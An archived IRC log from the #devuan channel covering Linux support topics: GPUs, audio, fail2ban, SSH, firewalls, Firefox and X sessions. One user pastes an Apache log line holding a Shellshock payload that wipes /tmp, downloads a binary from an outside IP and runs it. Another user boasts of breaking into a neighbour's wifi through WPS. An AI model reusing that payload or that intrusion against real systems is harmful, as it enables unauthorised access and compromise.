libera/#devuan/ Friday, 2018-11-23

drwhiteHowdy peeps... What needs to be installed so that the system can recognise multiple graphics cards and use them all at once? Or is that something that has been removed? Or is it something that can be added quickly please?00:31
djphlike SLI?00:44
drwhiteno.00:46
djphso just randomly throwing two or more cards in the pc?00:47
drwhiteI have CPU and Discrete00:48
drwhitethat makes 200:48
djphand you inly plug into one ...00:48
djph*only00:49
djphunless its a laptop, and you've got to slap primusrun or whatever AMD uses.00:49
drwhiteprimusrun?00:51
drwhiteI don't have to do that with other version of Linux.00:51
drwhiteUbuntu doesn't have it and it can run 2 GPUs fine.00:51
djphprimus is nvidia's split-gpu laptop tech.  dunno what amd does.00:53
djphfor a desktop, one normally ignores the cpu ... though ive always had enough outputs on the nvidia cards ...00:54
drwhiteBut on a laptop, not always, because I use a docking station.01:00
drwhiteSo Primus will allow Devuan to use both the i7 chip and the Discrete at the same time?01:02
drwhiteOn a desktop, I often use the CPU for the on-board, and then have a GPU as well.01:03
alexandros_cHappy Thanksgiving to all my American friends01:06
drwhiteAnyone here have a Lenovo P52?01:18
drwhiteand running Devuan. (of course)01:18
Xenguypm-is-supported returned no output:  anyone know how to interpret that result?01:19
drwhitedjph: Trying it now. Is there anything else that needs to be installed at the same time?06:11
drwhitewhat is "libsystemd0" ?07:00
drwhiteis that systemD?07:00
KatolaZdrwhite: it's a library to use the systemd functionalities07:05
KatolaZharmless if you don't have systemd running in your system07:06
drwhiteit can be uninstalled?07:07
drwhiteor is it for those things that use systemD to integrate into a non systemd environment?07:07
KatolaZdrwhite:07:16
premobossif i set some part of File System in "Read-only" (i.e. /usr/), will the general performances speed up?11:45
debdogsounds unlogical hence it's possible11:47
premobossdebdog, i think that there are not ovehead oj journal and no file system check at the start up and not "you have mounted the partitrion n times, check forced" messages at start up.11:49
KatolaZpremoboss: if you don't write on it there is no journal overhead...11:55
KatolaZbut having /usr ro is normally a bad idea11:56
KatolaZunless you decide to not ever install anything in there11:56
KatolaZpremoboss: I also don't understand what you mean by "some part of File System"11:57
premobossKatolaZ, as far as i remenber, /usr is "almost" read only: i mean, after i istalled all i need in my system, /usr shour not be writable by any process, am i right? is /home and /var that usually are often wrote inside.11:58
KatolaZpremoboss: I fail to see the point though12:00
debdogon a server inside the DMZ the more places are ro the better. but I doubt it'll increase 'general' performance12:00
KatolaZthat's why I fail to see the point12:01
premobossKatolaZ, my OS is on uSD. the point is that i wish to reduce I/O on uSD to (i hope) increase performances (no journal, no forced check on that partition, ecc) and to have less stress on yuSD caming from freqeunt write operations.12:02
Centurion_Danpremoboss: then use ext212:02
KatolaZpremoboss: but if you don't write anything in /usr, then you don't write enything12:02
KatolaZfullstop12:02
Centurion_DanI do that for /boot12:02
KatolaZwhere should the performance gain come from, if you don't write under /usr?12:02
KatolaZwhere should the I/O come from if you don't write on /usr?12:03
KatolaZthere should be no write operation at all under /usr if you don't install/upgrade/remove packages12:03
KatolaZirrespective of it being ro or not12:03
debdogto improve the µSDs life I'd look into fs options like noatime12:04
premobossif i use ext2 AND i get not clear shutdown, than i can have inconsistance filesystem and forced checke at treboot. so i need to make that /usr partition ext2 AND read only. sound right?12:04
Centurion_Danpackage installation aside there is little writing to /usr anyway, so mounting it with ext2 to get rid of the journal, and turning of noatime and you'll quiesce the writes to nearly nil anyway.12:04
premobossdebdog, also noatime, yes, i forgot. and nodiratime also.12:04
KatolaZpremoboss: no it sounds completely useless to me12:05
Centurion_Danpremoboss: but a not clean shutdown only happens if you happen to be writing when the power is pulled.  If the fs is not written to, it's not under risk of an unclean shutdown.12:05
premobossKatolaZ, id i have separate partition for /, /usr /home, /var, i wuill have faster check at the boot.. at least, i think so.12:06
premobossbecasue /usr will ben ever checked because of read only.12:06
KatolaZpremoboss: you are totally wrong on that12:06
KatolaZwhat you think is wrong12:06
WonkaI have, once, had a debian on a Seagate Dockstar - rootfs was RO, and for updating I had a script using unbind and mount to get a shell in which alone the rootfs was re-mounted rw12:06
KatolaZyou asked, we replied12:06
KatolaZyou're free to decide yourself12:06
KatolaZjust putting /usr ro is useless to reduce the load on a microSD12:07
premobossKatolaZ, ok12:07
premobossiw was a good idea in my mind, no probmel if i was wrong :-)12:07
gnarfacepremoboss: try mounting /tmp as tmpfs instead12:23
Wonkaalso /var/run12:31
system16Hi. i have a file server that runs no GUI or DE. i installed mpg123 on it. when i run mpg123 song.mp3 it says its playing it but there is no audio. i know this is silly . can this be a driver issue ?12:54
system16if yes , how can i install a generic driver for its built-in speaker ?12:54
gnarfaceit's probably just a alsamixer settings issue12:55
gnarfacerun alsamixer, make sure you've got volume on the right channels and they're unmuted12:55
gnarfaceif it was a driver issue, usually you'd expect an error.  not always, but usually.12:55
system16apt install alsamixer ?12:56
system16there is no package called alsamixer12:57
gnarfaceit's in alsa-utils12:57
system16its downloading alsa-utils12:58
system16ok i ran alsamixer12:58
system16some bars showed up12:58
system16im not a audio guy. what do these mean ?12:59
gnarfaceif you have more than one soundcard, these are only the controls for the first detected one12:59
system16it says master 012:59
gnarfaceup/down arrows to change volume12:59
gnarface"m" to toggle mute12:59
gnarfaceleft/right arrows to select volume slider13:00
system1600 means mute ?13:00
system16or MM ?13:00
gnarfaceMM is mute13:00
system16ok let me try again13:00
system16SHIt13:01
system16it worked13:01
system16thanks alot13:01
gnarfaceno problem13:01
system16now i can make devuan run system initiated.mp3 on startup13:01
system16doo you know where is the startup directory ?13:02
system16do*13:02
gnarfacei don't know13:03
gnarfacethere's a few ways to do it13:03
system16there is a script that runs commands on startup. i cant remember its name13:03
gnarfaceare you thinking of /etc/rc.local?13:03
system16yes13:03
gnarfacethat's probably the easiest thing to use if you're not using a GUI13:04
jyrihmm, grub-install broke on ceres13:05
gnarfaceuh oh13:05
jyrigrub-install: error: cannot copy `/usr/share/locale/bg.gmo' to `/boot/grub/locale/bg.mo': Is a directory.13:06
system16it wont break anything right ? (running a .mp3 file on startup )13:06
gnarfacesystem16: nothing comes to mind13:07
system16damn. it has a loud speaker13:07
gnarfaceit should be smart enough to save and restore the alsamixer settings on it's own13:08
gnarfaceyou can call amixer directly from your script if you want though13:08
system16why tho ?13:08
gnarfaceoh, if you wanted to turn the volume down, or make sure it never got set above some arbitrary maximum13:09
system16its set on 65 (master)13:09
gnarfaceno physical volume control on the speaker?13:09
system16no13:10
gnarfaceeh13:10
system16when it ran windows , i controlled the speaker with fn+f713:10
gnarfacei've got my headphones set to 3313:10
gnarfacehardware's all different, but if it's loud at 65 that's not a huge surprise13:11
system16its a netbook.13:11
system16https://www.soundsnap.com/search/audio/system+initiated/score13:19
system16which one do you prefer ?13:19
gnarfaceof what? don't make me click the link13:32
system16gnarface, those are some system startup sounds13:45
system16i chose "light speed sequence initiated"13:45
gnarfaceoh, gotcha13:45
system16that stupid website wanted to charge me 3 $ for a 6 second file. (but i recorded the sound with my phone using AUX) hahaha13:46
system16also. should i install a terminal based anti virus to keep my stuff safe ?15:19
gnarfaceit's probably not necessary if you are following best practices15:20
system16like ?15:20
system16root login is off15:20
system16system is up-to-date15:20
gnarfacejust, if you know how permissions work and you've got it secure, yea, and up-to-date15:20
system16i have a strong password15:20
gnarfacenetwork side too15:20
gnarfacedon't click on email attachments, etc15:21
system16gnarface, everything inside home is 77715:21
gnarface:-P15:21
system16afaik15:21
gnarfacethat might be unnecessarily risk15:21
gnarfacerisky15:21
system16<gnarface> don't click on email attachments, etc there is -no- GUI15:21
gnarfaceoh, right, you said that15:21
gnarfaceyea, that'll really limit the attack surface too15:22
system16then what should i do ? 776 ? 767 ?15:22
system16the only thing that is really bugging me is ssh key15:22
system16i use ssh password username login15:22
gnarfacethe defaults should have been sane15:23
gnarface75515:23
system16idk15:24
system16some are 77715:24
system16some are not15:24
system16only my ex drive is 77715:24
system16i just found out its not15:25
system16so i think im good on permissions side15:25
system16what next ?15:25
system16fail2ban is running but idk how to configure it15:26
gnarfacefirewall?15:26
system16my router has firewall15:26
system16its up-to-date.15:27
system16the router*15:27
system16gnarface, should i set up a firewall on the server too ?15:28
gnarfacewouldn't hurt15:28
gnarfaceprobably15:28
system16do you know how ?15:28
gnarfacei can give you some simple iptables commands that might work15:29
gnarfacenothing fancy15:29
system16thanks. go ahead15:29
system16i must be root right ?15:30
gnarfaceyea15:30
system16it wont mess with ssh_d and sftp and open ssh right ?15:31
system16(this is a sftp server)15:31
gnarfaceit will unless you leave a hole for ssh15:31
system16what15:32
system16oh its like windows firewall right ?15:32
gnarfaceyea i guess15:33
system16then i cant run them rn15:33
system16because im using ssh15:33
system16and the server is under my closet15:34
system16(im feeling lazy right now)15:34
gnarfacewell i'm sure you can find examples online15:34
nemowhy does devuan recommend following the LSB init conventions but does not have /usr/lib/lsb/install_initd ?15:35
nemois this some debian thing I'm unfamiliar with?15:35
system16the ultimate fix is to disable port forwarding15:35
system16which makes this only accessible on LAN15:35
nemosystem16: eh... I'm still super annoyed that my router does not have an option to block the HTTP server on the wifi interface - I don't need a full firewall, just option to specify interfaces for bind15:37
nemosystem16: sometimes the LAN is not super trustworthy either15:37
nemobasically I occasionally have to give wifi password to folks visiting and I don't want to trust router's webserver given historical fails on that front15:37
system16nano like my neighbor wants to see whats on my server ?15:38
system16i managed to hack his wifi due to WPS15:38
nemocan see why depending on LAN one might not trust it.  also if the machine is a laptop could be on all kinds of hostile LANs15:38
system16with a simple android app on google play lol15:38
nemosystem16: when the local fios company was deploying in this area they issued everyone wifi with a 40 bit wep key15:38
system16i have disabled WPS15:38
system16of course im using WPA-215:39
nemosystem16: the funny thing about it was the wep key shared first 24 bits of an alphanumeric uppercase key with the network name15:39
nemojust to make things easier ☺15:39
system16they are dumb af15:39
nemobut yeah. on most linux systems one knows what is running, so firewall is not super useful IMO15:39
nemosystem16: yeah you could manually "hack" it just by iterating over 36² combinations15:40
nemothey did eventually fix that, although there's still a few of them floating around15:41
system16how the hell did you do this ?? 36^2 ???15:41
system16its format is like textbooks15:42
nemohm?15:42
nemooh15:42
nemoXCompose ftw ☺15:42
nemoI bind it to capslock key15:42
system16damn15:42
nemohttps://docs.perl6.org/language/unicode_entry#XCompose_(Linux)15:42
system16nemo can u hack my server ?15:42
nemosystem16: I also have some useful emoji in mine15:42
nemoO_o15:43
system16probably not15:43
r3bootnemo: a firewall is very useful tool, especially in the 'you know what runs' scenario, since stuff that's not supposed to run will be blocked by default + needs explicit whitelisting15:43
system16its security is to notch15:43
nemomost "hacking" these days is spear phishing/social engineering15:43
system16top*15:43
nemor3boot: sure sure.  it's just I happen to know what's running is all15:43
system16i mean can you force your way into my server ?15:43
system16brute force*15:43
nemor3boot: it's the rationale behind lack of default firewall on many distros15:43
r3bootnemo: sure. And are you 100% sure that those apps dont make any outbound connections? How do you guarantee that? ;)15:44
nemoincluding ubuntu and debian15:44
system16u need my username and password which is extremely long15:44
system16and my public ip15:44
nemor3boot: the services? I know which ones make outbound connections yes15:44
system16which changes every day15:44
system16or my ddns domain15:44
r3bootnemo: and now one of your services is hacked + spawns a bind shell, now what? :)15:44
nemor3boot: and no I'm not going to review the code, although I've run netstat and such in past when something seemed odd15:44
nemor3boot: if I've been hacked firewall is not going to protect me15:45
r3bootyes, it will, because it will block the connection to the bind shell15:45
nemo15:45
nemor3boot: if someone has root access it is game over15:45
nemofirewall will do jack squat15:45
system16nemo, but can you ?15:45
r3bootsure, but you dont run stuff as root right?15:45
r3boot+ you're patched & are running a RBAC framework, so getting root is not easily possible15:46
system16root login is off15:46
system16and there is no GUI15:46
system16no DE15:46
r3bootall it takes is one vulnerable service15:46
nemor3boot: ok. I see scenario. for example. considering apache as service w/ a (large) attack surface.  someone manages a local execute. trouble is. service is already doing outbound connections.  so detecting that is pretty tricky apart from monitoring traffic15:46
system16plain command - line interface15:46
r3bootnemo: apache normally only makes connections towards backend services, not towards the internet, so that's trivial to detect15:47
nemor3boot: apart from that there's not much exposed outbound to hack15:47
r3bootthat's obscurity15:47
r3bootyou want multiple levels of defense ;)15:47
nemor3boot: eh. I do have some relaying on mine15:47
system16r3boot, everything is uptodate15:47
nemor3boot: I understand *why* people have it15:47
system16i ran apt upgrade15:47
nemor3boot: and I even listed at lesat one case locally I wish I had it, and still don't15:48
system16im planning to put apt upgrade on startup15:48
nemoI'm just questioning it being of super-high utility15:48
system16using rc.local15:48
r3bootI just think it's bad advice to tell people /not/ to run a packetfilter15:48
r3bootyou should run one, by default, to ensure that you know what goes in/out of a system15:48
r3boot+ are able to provide guarantees for that15:48
nemo?? did I say they shouldn't?15:48
nemowut15:49
r3bootI guess we have a difference in definition of 'super useful'15:49
nemoanyway. devuan by default does not have one15:49
nemoso I guess devuan is giving bad default advice too by your definition ☺15:49
r3bootalmost no OS/Distro comes with a default-deny packetfilter :(15:49
system16is devuan safe out of the box ?15:49
nemoubuntu either15:50
nemohm15:50
nemoalthough that might have changed15:50
r3bootcentos/rh does, but that comes with a default-allow ruleset15:50
system16im trying to setup fail2ban15:50
nemomy information about ubuntu halted at 14.0415:50
r3bootthe BSD's dont come with a firewall15:50
r3bootnor do the commercial unices15:50
r3boot(+ dont come with a firewall thats enabled by default)15:50
nemosystem16: anyway WRT "hacking" people, I lost any interest in that a long long time ago. basically once past college computer lab15:51
nemo"15:51
nemo"hacking" up stuff on my own system is way more fun/productive15:51
r3bootThe 'why' for that is much more difficult tho. Part of it has to do with people not understanding TCP/IP, part of it has to do with people not wanting to bother with packetfilters, etc15:51
system16do you think im at risk15:51
system16?15:51
r3bootsystem16: if you just stick to your part of the internet and dont piss off anybody, you'll be just fune15:52
system16wat ?15:52
r3boot*fine15:52
system16port forwarding is ON. should i turn it off ?15:52
r3bootport forwarding to *which* port?15:52
system162215:52
r3bootnot a problem15:52
nemor3boot: the actual things that make my system significantly vulnerable (browser, intel boot manager, crappy ssh passwords)  are not going to be mitigated by firewall15:52
nemor3boot: that's why I can't bring myself to care15:52
system16i tried changing it. no luck15:52
nemoit's a significant complexity for the 0.1% case15:53
r3bootnemo: even in those cases it's very useful. Run your vulnerable apps under a different userid then your login id, and use iptables with uid/gid matching to only allow the connections you want15:53
nemor3boot: at present I have exactly 2 things bound. ssh and apache15:54
* nemo takes down apache again15:54
* r3boot used to run my browser under a different user id which forced *all* connections through a proxy (no direct connection possible)15:54
system16LOL15:54
system16Server replied: pong15:54
system16i pinged the fail2ban server15:54
system16i think it pinged 127.0.0.1 ?15:54
r3bootnemo: otoh, I work with servers most of the time, and on those boxen, you *want* outbound firewalling15:54
nemor3boot: yeah. sorry. don't care enough15:55
nemobut I understand the attractiveness of that kinda thing15:55
r3bootdesktops are a lot harder to secure, yes15:55
nemor3boot: I don't work much with the servers at work, but AFAIK they are restricting traffic outside the server itself15:55
nemor3boot: on the various segmented LANs15:55
system16is 1 jail enough ?15:55
system16|- Number of jail:      115:55
system16`- Jail list:           ssh15:55
KatolaZsystem16: it depends on the number of thieves....15:56
system16what about sftp ??15:56
system16should i add more ?15:56
r3bootsystem16: maybe it would help you if you read up a little bit about hosting services before you ask such questions15:56
nemor3boot: like. I can ssh in to my dev server, but not out, and that has nothing to do with the rules on it.15:56
nemor3boot: got to fill out annoying amoutn of paperwork to do anything fun15:56
r3bootnemo: ah, then you have firewalling on the network level I think15:57
nemothat's what I said?15:57
r3bootyep15:57
r3bootor atleast, that's what I inferred based on the dev server, with vlans, and not being able to send out outbound traffic without filing paperwork15:58
nemo09:35 <+nemo> why does devuan recommend following the LSB init conventions but does not have /usr/lib/lsb/install_initd ?15:58
nemoI'm trying to install a cylance service "properly"15:58
system16r3boot im just trying to keep uninvited guests out15:58
nemoalready had to hack up the .deb to make their stupid kernel module load on debian15:59
nemoI thought install_initd would be the way to go15:59
nemo(right now I just made the symlinks manually - but I added the header since the init manager complained)15:59
r3bootsystem16: just use ssh pubkey authentication and disable password-based logins. Then you dont even need the complexity of fail2ban15:59
system16i tried that before15:59
system16cannot be done15:59
r3bootLOL15:59
r3bootwhy not?16:00
system16it would keep asking a password16:00
system16and it was too complex16:00
nemoI'm running fail2ban just 'cause the log noise annoys me. also a couple of those assholes also spam my apache. one of them I knew and actually found something I was mildly careless with16:00
nemoI mean. didn't do any harm, but was irritating16:00
r3bootsystem16: right, okay, well, its /the/ solution for securing your ssh16:00
r3bootsystem16: fail2ban will not protect you from accounts with bad passwords16:01
KatolaZsystem16: if it keeps asking for a password you have a problem in your sshd config16:01
system16i have a 11 character password16:01
system16it has every thing in it16:01
KatolaZo_O16:01
system16numbers...letters... etc.16:01
system16symbols16:01
KatolaZand you think that's "secure"?16:01
KatolaZ:D16:01
system16at least its not 123416:01
r3bootthere are multiple things to check here. 1) Is pubkey auth enabled in sshd? 2) Is your authorized_keys file only readable by your own userid? and 3) is there any RBAC framework blocking access to authorized_keys?16:02
nemoKatolaZ: well if someone is trying to guess by trial and error, almost anything that isn't "password"  is probably fine - these people don't even bother with the published lists16:02
r3bootoh, and 4) Are you passing your ssh key along with ssh?16:02
KatolaZis the .ssh/ folder only rx for the owner?16:02
r3bootKatolaZ: yes16:02
r3boot0700 for .ssh, 0600 for authorized_keys16:02
KatolaZis the key the correct one?16:02
nemoKatolaZ: I'm pretty sure most of the probes are just hunting for unsecured IoS stuff16:02
r3bootassumptions ;)16:03
system16fyi i reverted every setting that i made. i have to start on square 116:03
system16ALSO16:03
r3bootbut okay, I'll shut up16:03
system16some apps wont use ssh key16:03
KatolaZsystem16: you also have to do some reading about ssh config16:03
r3boot(way to many years of experience with hosting industries, I'll let you guys make your own mistakes)16:03
system16vlc does not support user pass auth16:04
nemoO_o16:04
nemovlc supports ssh authentication?16:04
r3bootSetup a ssh tunnel then :)16:04
nemowhaaat16:04
nemowhat for?16:04
system16KatolaZ, i know what is that. i used that to disable root login16:04
system16nemo, to stream stuff to TV16:05
system16it has a sftp browser built in16:05
r3bootchromecast stuff? Or some other protocol?16:05
system16yes.16:05
system16chromecast16:05
r3bootthat wont work over ssh, since that requires multicast16:05
system16well it works rn16:06
system16soo16:06
r3bootwell, not unless you setup a tun/tap device and either make that part of the layer2 segment, or enable multicast routing on your network16:06
nemosystem16: I don't know too much about your setup, but personally I'm not a huge fan of smart TVs - I settled on an old laptop plugged into TV - is super flexible as to playing whatever random stuff, and is also easy to transport ☺16:06
* r3boot has kodi for that16:07
system16this is a SFTP server16:07
system16and vlc supports sftp16:07
system16as simple as that16:07
r3bootAha, that's not a chromecast protocol ;)16:07
nemosystem16: so.. that's not super surprising then. sure16:07
system16and vlc casts that to my chromecast16:07
nemosystem16: like. tons of stuff uses gvfs - not too sure what vlc uses16:07
nemosystem16: but if it is using gvfs or similar then so long as your ssh key is in your keyring, it should just work16:08
r3bootworse-case you could use sshfs16:08
system16i asked the vlc staff, they said future vlc ver. will *probably* support ssh key16:08
nemoback when my SO was on her first-gen iOS I satisfied her desire to access her iphone from her linux machine using myTunes to fix the file naming plus ssh automount16:08
system16and i mainly use my server to stream stuff soo16:09
nemoautofs + sshfs16:09
nemocan use that if whatever the heck vlc is using is being a PITA for you16:09
nemoit works surprisingly fast16:09
system16how many IPs does 1 jail house ? 1 ?16:09
r3bootsystem16: you could also try to enable ssh multiplexing, and then (using autossh or a custom script) let your system establish the multiplexing tunnel. Next, reconfigure your vlc to just use ssh + connection multiplexing, and you can bypass authentication16:09
system16sounds like its not EZ16:10
nemobut yeah in her case ~/Desktop/iphone when doubleclicked on autofs connected to the iphone so she could see her music16:10
r3bootsystem16: hosting isnt easy ;)16:10
system16it is16:10
system16im doing it rn16:10
r3bootahja, okay, well, good luck then :)16:10
system16haha16:10
nemosystem16: bet vlc can also do HTTP, why not just share your local media over that? it's LAN anyway16:10
nemowhy not let everyone get to it?16:10
system16its no on lan16:11
nemoah16:11
system16its on the internet as well16:11
r3bootJust chmod 0777 it ;+16:11
r3boot(no, dont do that!)16:11
nemosystem16: your chromecast tv is not LAN? O_o16:11
system16as i said. i have port forwarding enabled16:11
system16no no16:11
system16the sftp server is on wan and lan (thats what i meant)16:11
nemosystem16: ok... so... you'd still be fine w/ HTTP on LAN for VLC+chromecast ☺16:11
nemoand probably pretty trivial to enable16:12
nemoheck maybe chromecast can read http too. dunno16:12
r3bootnemo: but, is it an actual chromecast device? :) A chromecast uses rtmp-over-multicast, not sftp16:12
system16i live near a street filled w/ dru addicts16:12
system16drug*16:12
system16and my router has a strong antenna16:12
system16its wifi signal reaches the stree16:12
system16t16:12
system16i cant limit it because of stupid dlink16:13
nemor3boot: I think he said he was streaming to chromecast from vlc16:13
nemor3boot: and vlc was reading his movies off of the sftp server16:13
system16it has 3 options : antenna power : 100 % 50 % 25 %16:13
nemor3boot: and I was just suggesting HTTP as being maybe easier to setup for his local media lirbary16:13
system1650% is too low16:13
system16isnt http unsafe ?16:14
nemosystem16: what does your wifi signal have to do w/ this? you said the network was using WPA216:14
system16yes16:14
nemosystem16: http, https. whatever. it's your LAN. you claim it's encrypted already16:14
system16but it does not mean its unhackable16:14
nemosystem16: the only existing WPA2 hack attacks the device. make sure your devices are up to date ☺16:14
system16it is16:15
nemo(KRACK)16:15
system16is it possible to ditch wlan0 ?16:15
system16on the server16:15
nemois your house wired with cat5?16:15
system16(its connected via ethernet)16:15
r3bootnemo: oh, like that, yeah16:15
system16i think the command started with ifconfig16:16
nemosystem16: anyway. if you don't trust your LAN, which is probably not unreasonable. HTTPS - whatever.16:16
system16https ?16:17
system16a web server ?16:17
nemo10:14 < system16> isnt http unsafe ?16:18
nemohttps + letsencrypt16:18
KatolaZo_O16:18
nemomaximise devices that can connect to your movies ☺16:18
system16ssh is better i think. because i can remotely manage my server16:18
system16nemo , right now, my freaking smart watch can connect to it16:20
nemosystem16: uh. you can have both running16:20
nemowas just thinking it might be easier for your chromecast/phone/vlc/firefox/whatever16:20
* nemo shrugs16:20
system16did you mean HTTPS file server ?16:20
nemoyes16:20
system16oh16:21
system16its kinda cool. it will have a web server too16:21
nemojudging from the spam in my apache log, not installing any CGIs or PHP interfaces avoids 99.9% of the attacks out there16:22
nemoso just hosting static content, probably totally fine16:22
nemonot to mention could just do it on LAN for starters16:22
system16currently , there are movies, photos and bunch of apps on the server16:23
nemosome of the stuff in log is fairly entertaining16:23
nemoexample16:24
system16OH16:24
nemo222.186.138.49 - - [12/Jan/2018:13:18:39 -0500] "GET / HTTP/1.1" 200 5710 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.158.162.80:258/synliang -O /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() {16:24
system16did i mention that16:24
nemo:; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.158.162.80:258/synliang -O /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""16:24
system16this server is not on all the time ?16:24
nemothat script does not seem very efficiently written16:24
system16i suspend it when i dont need it16:24
system16and it does not support WoL so no one can wake it up on lan or wan16:25
nemosystem16: oh it was you doing that16:25
nemosystem16: yeah. I was wondering why you don't just leave it on all the time using a low power device ☺16:25
nemosystem16: I think I ran numbers and based on machine you are using now, an RPI would pay for itself in about a year16:25
system162 reasons 1- its a netbook i dont want to put pressure on it. 2-safety16:25
system163-why not ?16:25
nemo'cause having it on all the time is more convenient16:26
nemo② is pretty dubious16:26
nemo① is fixed by switching to an RPI zero ☺16:26
system16i have plugged in a wireless usb mouse. when i right click it. it wakes up16:27
* nemo shrugs16:28
nemosystem16: might be out and about one day and wishing you didn't have it suspended to get to something at home16:28
system16if it works it aint stupid :)16:28
system16yes. thats the only down side16:28
mooseface420dragon isn't playing audio and vlc install failed lol16:41
jordilai would like to downgrade from Firefox-ESR actually in v60 to v52. If possible which is the recommende path to ?16:48
nemomooseface420: I had VLC install problems some time ago, that were due to having wrong repos after migration to ascii16:49
nemomooseface420: no idea if your problems are same16:49
nemojordila: so. 52 is unsupported at your own risk - you should download a zip of it off the mozilla server, and run it standalone yourself16:49
nemojordila: noscript strongly recommended - and I understand why you are doing this... one of my firefox profiles is still on 5216:50
nemohell. one's still on *4* due to the occasional legacy crap that only speaks old versions of https16:50
nemojordila: but yeah. it's obviously a dangerous thing to do16:50
nemojordila: if you list the extensions you're dependent on, could try seeing if there's finally versions of 'em out there16:51
nemojordila: http://ftp.mozilla.org/pub/firefox/releases/52.9.0esr/16:52
jordilanemo, i was reading on https://mozilla.debian.net/ that ...16:52
nemoer16:52
nemohttps://ftp.mozilla.org/pub/firefox/releases/52.9.0esr/16:52
jordilacould it be that i'm able to add repo's for v52 à la 'Debian Mozilla' team... or may have i dreamed it ?16:53
nemojordila: 52 is unsupported simple as that. I don't think it's a good idea to have it outside your user folder at all16:54
nemojordila: ideally keep it in a separate account16:54
nemoin maybe a jail16:54
jordilaah16:54
nemowhile there's certainly good reasons to have it, it's not really safe to use16:55
nemojordila: definitely use noscript and turn off plugins when browsing web16:55
nemojordila: just use the mozilla zip in a user home16:56
nemomaybe clone one of your firefox profiles16:56
nemojordila: do you know about -no-remote and -P ?16:56
jordilano to yet, nemo.16:57
system16im in the fail2ban conf file right now16:57
jordila(typo : not yet, nemo )16:58
system16should i enable ssh_ddos ?16:58
system16its False16:58
system16also the fail2ban is working. i managed to get my phone banned for 10 min16:58
system16i want to change bantime to 2hrs16:59
jordilanemo , what is -no-remote and -P ?16:59
nemojordila: -P is for launching alternate profiles   -no-remote ensures if you have firefox already running the new one doesn't try to use it instead17:10
nemojordila: so...  firefox -no-remote -P unsafeLegacyProfile17:11
system16nemo17:11
nemomake a shortcut like that17:11
system16my phone is banned for 2000017:11
system16seconds17:11
system162000*17:11
nemosystem16: ssh ddos? can't hurt.17:12
jordilanemo , i think i might go in other direction ... instead of downgrading, i wouldrather upgrade to the very last (Nightly) Firefox version ?17:13
nemojordila: I did that myself, just to get more usable addons... and 'cause I was already using nightly anyway17:13
nemojordila: I'd still suggest backing up profile17:13
jordilanice to know , nemo17:14
nemojordila: cp -r your existing firefox profile to a new name and use the profile manager to add it17:14
system16nemo since i didnt know what it exactly does, i didnt touch it17:14
nemothat way if nightly or the addosn you installed in nightly eff something up, nbd17:14
nemojordila: https://support.mozilla.org/en-US/kb/profile-manager-create-and-remove-firefox-profiles17:15
nemojordila: it's funny how few people know of this feature that firefox has had for like... since forever. since it was the Mozilla web browser17:15
nemochrome finally adds profiles, people get super excited.  firefox adds the container thing "oh, you mean like chrome profiles?"  NO17:16
nemojordila: firefox -no-remote -P  to launch the profile manager to set all this up17:16
system16yelp17:17
system162018-11-23 16:20:35,100 fail2ban.actions[2641]: INFO    Set banTime = 60017:17
nemo(their walkthrough says "close all firefox" meh, whatever -no-remote is more convenient)17:17
system16it didnt do shit'17:17
system16i added bantime = 2000 to every section17:17
system16there was no bantime in that conf file. i was told to maunaly add it17:18
premobosshi dudes. i am using lightdm and LXDE  with autimatic login. the pc is dedicated only to web surfing. i will like to avoid lxde and run as soon as the PC start a web navigator (ie. chromium). there is a way to do that?17:32
jonadabpremoboss:  Most obvious way is to create a custom session type.17:33
jonadabThere should be how-to documents online for how to create a custom X11 session, I think.17:34
premobossjonadab, i dont know how to do. can you poin me out that howto if you know where it is?  i tried ot search but probably i user the wrong keywords in google bbecause i dont find good infos.17:35
jonadabI don't happen to know off the top of my head.  I've done it before, but it's been a while.17:35
jonadabTry the phrase "custom X11 session", or something like that.17:35
premobossthanks.17:36
jonadabOr maybe man 5 xsession17:37
jonadabAs best I can remember, you create two things:  The session itself is an executable file (usually a simple shell script) that starts the things you want.  If you're starting multiple things, all but the last one should be started in the background with &.  You typically put this file in /usr/local/bin17:41
jonadabAnd the other thing is a description file that the display manager (or startx or whatever) can read in order to know that this type of session is available.  This is a text file in a specific config-like format that specifies things like what the session is called in the list of possible session types, what program to run for it, and a couple of other things.17:42
jonadabThis has to go in a particular directory, and that location is the main part that I don't remember off the top of my head.17:42
jonadabYou can copy one of the existing ones and edit it, that's what I did.17:42
jonadabAh, /usr/share/xsessions is the magic location, I think.17:44
jonadabHTH.HAND.17:44
premobossnice to know, thanks jonadab. i go to try17:55
errandir1why run lightdm in the first place if you want to autologin? After auto login just do startx to start the WM17:57
premobosserrandir1, because i am going to modify an exixtying distro, i man not building from scratch.17:58
errandir1sure, but you can disable any service you don't need in any distro18:00
premobosserrandir1, my need is: start a graphocal application (firefos or chromium) as soon as the PC start. the need is to do autologon in the pc and to minimize the start up time from "turn on pc" to "usable firefox"18:01
jonadaberrandir1: lightdm is one way to _do_ autologin, I think.18:02
iovecagetty can do autologin, don't need a DM for that18:03
errandir1to me it's just too heavy a hammer, and premoboss wants to minimize the startup time. To minimize that start by not running anything you don't need18:04
jonadabAll true, as far as it goes.18:04
jonadabBut sometimes people design things based on what they already know how to do.18:05
jonadabBut yes, console autologin + startx in the login script would be more efficient, technically.18:05
premobosserrandir1, i already disabled daemons, recompiled kernel to reduce his size and his time to load. now i must  work on GUI. if you know better way to follow, please tell me. i can remove lighdm and lxde, the important ting is login and to run automatically chromium at login.18:06
premobossat login = at start of the pc.18:06
errandir1you'll need lxde to show chromium18:07
errandir1start like iovec says, get agetty to do the autologin18:07
errandir1lxde will read the .Xclients file when it starts, so start chromium from there.18:08
premobosserrandir1, is it not possible to stat chtomiom on X server without to have lxde between X and cromium?18:08
errandir1maybe, I've never tried that myself. All the other stuf I have done18:09
